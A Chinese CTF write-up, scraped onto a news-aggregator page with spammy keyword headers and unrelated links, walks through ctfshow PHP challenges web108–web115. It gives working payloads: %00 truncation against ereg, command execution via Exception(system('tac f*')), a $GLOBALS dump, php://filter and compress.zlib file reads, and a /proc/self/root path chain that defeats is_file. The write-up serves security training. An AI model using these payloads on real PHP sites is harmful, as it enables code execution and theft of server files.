当前位置: 首页 > news >正文

张家界旅游网站官网婚礼案例网站

张家界旅游网站官网,婚礼案例网站,郴州建设工程建设信息网站,电脑软件商店十大排名web108 ereg函数相当于而preg_match()函数 ereg函数的漏洞:00截断。%00截断及遇到%00则默认为字符串的结束 strrev函数就是把字符串倒过来 就是说intval处理倒过来的传参c0x36d(877)?ca%00778 web109 异常处理类 通过异常处理类Excepti…

web108

在这里插入图片描述在这里插入图片描述ereg函数相当于而preg_match()函数
ereg函数的漏洞:00截断。%00截断及遇到%00则默认为字符串的结束
strrev函数就是把字符串倒过来

就是说intval处理倒过来的传参c==0x36d877

在这里插入图片描述?c=a%00778
在这里插入图片描述

web109

异常处理类
在这里插入图片描述通过异常处理类Exception(system(‘cmd’))可以运行指定代码,并且能返回运行的结果(如果存在返回)

?v1=Exception&&v2=system('ls')

在这里插入图片描述?v1=Exception&&v2=system('tac f*')
在这里插入图片描述

web110

filesystemiterator 遍历文件类DirectoryIterator 遍历目录类getcwd()函数 获取当前工作目录 返回当前工作目录

在这里插入图片描述?v1=Filesystemiterator&v2=getcwd
在这里插入图片描述缺陷是如果flag的文件不在第一位的话,就不能得到这个文件名。而且这个也没法读文件,所以这题的flag文件和之前一样都是.txt。
访问文件在这里插入图片描述

web111

在这里插入图片描述这道题没蒙,看了大佬的题解太详细了我写的也会很详细

PHP中,$a 本身表示一个变量名,而 &$a 并不是表示“a的位置”,而是表示对 $a 变量的引用。
在这里可以认为是地址

getflag函数

eval("$$v1 = &$$v2;");
//将v2的地址传给v1
var_dump($$v1); 
//打印v1 

v1中必须有ctfshow字符

var_dump会打印内容,但是并不知道flag在哪个文件于是使用PHP的超全局变量$GLOBALS

然后构造payload

?v1=ctfshow&v2=GLOBALS

在这里插入图片描述

web102

在这里插入图片描述is_file检查file是不是文件
这里过滤了很多php伪协议的东西但是最常用的filter还可以用

file协议不能绕过is_file的判断。
http协议需要公网ip。
glob协议返回的是一个数组。highlight_file不能对数组进行高亮,所以本题不能用。
?file=php://filter/resource=flag.php

在这里插入图片描述

web113

在这里插入图片描述filter过滤之后,可以用压缩流
?file=compress.zlib://flag.php在这里插入图片描述还有一种方法是目录溢出让is_file测不出file是文件

/proc/self:不同的进程访问该目录时获得的信息是不同的,内容等价于/proc/本进程pid//proc/self/root/是指向/的符号链接,就是根目录。
?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

也可以

web114

在这里插入图片描述刚才的目录溢出和压缩流用不了了,但是你看filter还有哈哈哈哈

?file=php://filter/resource=flag.php

在这里插入图片描述

web115

在这里插入图片描述

filter函数将0x,0,  .  ,e,+都过滤了
然后num还要满足
is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36' 

trim函数主要功能是从给定的字符串两端(即开头和结尾)去除指定的一系列字符

is_numeric可以在数字前面加**空格**绕过($num!=='36'这个也可以绕过)filter也可以绕过了
%0c(换页)绕过trim函数
?num=%0c36

在这里插入图片描述

http://www.yayakq.cn/news/67407/

相关文章:

  • 怎样做浏览的网站不被发现服务周到的网站建设
  • 个人网站 百度推广西双版纳傣族自治州天气预报15天
  • 桥头做网站鞍山信息港家讯房产
  • net网站开发框架定制化网站一般价格
  • dw建设网站视频教程网站的建设与维护怎么弄
  • 信息化网站建设有什么用浙江大学微纳加工平台
  • 咸阳网站建设多少钱优化防控工作的二十条措施
  • 网站怎么做描文本百度关键词如何优化
  • 好心人给个安全的网站莱芜要出大事
  • 做视频比较好的理财网站有哪些南通网站建设找哪家好
  • 一块钱涨1000粉网站最新网页游戏大全
  • 外贸移动商城网站开发七宝网站建设
  • 成都网站seo排名优化自己弄个网站要多少钱
  • 天津行业建站做校园网站
  • 网站内页修改关键字怎么注册公司微信号
  • 开一间网站建设有限公司做h5免费的网站有
  • 外贸网站建设 福田高级搜索入口
  • 皖icp备 网站建设全县网站建设情况通报
  • 焦作高端网站建设免费行情软件有哪些
  • 传奇新开网站服广告设计公司需要什么设备
  • 免费网站模板带后台成都建设学校网站
  • 如何建立一个自己的网站?脑叶公司手机版下载
  • 做变性手术视频网站体验做黑客的网站
  • 南宁公司建站模板智慧团建网站首页
  • gg服务器租用网站wordpress菜单分页
  • 手机网站单页怎么做免费vps试用一小时
  • 企业网站公示怎么做做网站开通手机验证功能
  • 网站推广目标计划网站开发人才储备
  • 凯里市网站建设网站seo排名优化软件
  • 手机网站有什么区别吗如何下载海外app